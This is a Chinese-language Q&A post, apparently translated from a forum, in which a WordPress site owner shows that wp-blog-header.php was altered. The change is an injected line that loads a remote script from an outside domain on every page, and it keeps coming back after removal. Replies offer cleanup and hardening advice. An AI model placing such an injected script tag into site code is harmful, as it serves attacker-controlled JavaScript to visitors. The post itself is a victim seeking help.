【发布时间】:2015-12-23 11:12:27
【问题描述】:
由于某种原因,我的网站被黑了。
我检查了我的 FTP 文件,发现 wp-blog-header.php 最近被修改了。
这是我的wp-blog-header.php 在被黑之前:
<?php
/**
* Loads the WordPress environment and template.
*
* @package WordPress
*/
if ( !isset($wp_did_header) ) {
$wp_did_header = true;
require_once( dirname(__FILE__) . '/wp-load.php' );
wp();
require_once( ABSPATH . WPINC . '/template-loader.php' );
}
这是我被黑后的文件:
<?php echo "<script type='text/javascript' src='http://www.oxxtm.com/images/wp-logo.js'></script>";
/**
* Loads the WordPress environment and template.
...
所以,他们将这一行添加到我的文件中:
echo "<script type='text/javascript' src='http://www.oxxtm.com/images/wp-logo.js'></script>";
当我删除此行时,我的网站运行良好,但几个小时后他们又添加了此行。我检查了我的数据库行,但没有发现任何问题。 在我看来,这是一个新的失败。我昨天用谷歌搜索了它,我找不到太多,只有一些法国网站他们没有任何明确的解决这个问题的方法。那么,有没有人经历过呢?
这些是我在本网站中使用的插件及其各自的版本:
WordPress v4.1.8
Advanced Custom Fields v4.0.0
【问题讨论】:
-
确保 wordpress 是最新的。更改所有密码。确认没有其他用户帐户具有您未配置的 FTP 访问权限。如果问题仍然存在,请与您的托管公司联系。
-
您有备份吗?您是否托管在 Dreamhost 之类的共享托管网站上?如上所述,您很可能是后门程序 - 更改密码、擦除并重新安装(如果可能)并联系您的托管服务提供商。
-
WordPress 有一个关于如何处理被黑 WordPress 网站的详细常见问题解答。 codex.wordpress.org/FAQ_My_site_was_hacked
标签: wordpress